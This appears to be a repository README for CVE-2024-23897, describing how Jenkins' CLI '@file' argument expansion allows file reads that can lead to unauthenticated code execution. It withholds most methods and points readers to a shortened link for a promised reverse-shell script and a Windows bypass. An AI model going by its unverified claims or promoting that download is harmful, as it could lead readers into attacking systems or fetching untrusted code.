CVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE# CVE-2024-23897-RCE
CVE-2024-23897 is an arbitrary file read vulnerability through the CLI can lead to unauthenticated RCE
## Vulnerability
the jenkins CLI uses the args4j library which has the feature to access a file's content by using @ following the path of file.
which allows and attacker to read any file in the system,
** Attackers with Overall/Read permission can read entire files.
** Attackers without Overall/Read permission can read the first few lines of files
# CONTACT ME:
fr3nta1@proton.me
</p>
[get it here](https://bit.ly/42pnpQa)
## Exploit Steps:
Our goal is to achieve unauthenticated code execution using this vulnerability, which is very straight if we don't consider the limitations which we mentioned above.
</p>WHY?
</p>we don't need to read any file more than the first 2 lines to get what we want (RCE).
## EXPLOIT:
after analysing the possible ways, I can confirm that there are 3 possible and effictive ways of unauthenticated RCE,
which doesn't need any special configuration of the jenkins server or installing any plugins, which means everything we need is in default installation.
* "remember me " cookie
* REDACTED
* REDACTED
Note:
</p>For jenkins installation on windows machine, there is a flaw which I didnt see anyone mentioning it, which you can bypass the restrictions of read permission.
</p> I packed all these inside a simple python script which can trigger the vuln point and pops a reverse shell.
</p>for the bypass of read permission restriction, I wrote a short topic about and a GOLANG script which can bypass the restriction and read entire file (ONLY WINDOWS INSTALLATION OF JENKINS).
</p>as per my own research there are > 70k vulnerable instances out there, (>250k found jenkins and still scanning the internet)
[get it here](https://bit.ly/42pnpQa)
[4.0K] /data/pocs/eb512b8ca2dca7922236fe8378d01d58d5543245
└── [1.8K] README.md
0 directories, 1 file